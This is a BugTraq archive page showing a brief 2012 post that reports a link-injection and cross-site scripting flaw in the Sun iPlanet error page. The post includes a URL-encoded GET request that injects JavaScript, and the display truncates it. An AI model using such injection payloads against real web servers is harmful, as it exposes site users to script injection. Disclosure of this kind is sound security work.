BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Sun iPlanet Error Page Link Injection Jun 30 2012 10:11PM
BugsNotHugs (bugsnothugs gmail com)

Sun iPlanet Error Page Link Injection

known about long time, but no CVE! probably because this really lame
vulnerability! some security pro will say this good for social
engineering and give cyberwar example!

GET
/%27%29%3b%61%6c%65%72%74%28%27%58%53%53%5c%72%5c%72%27%2b%27%4c%6f%63%6
1%74%69%6...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus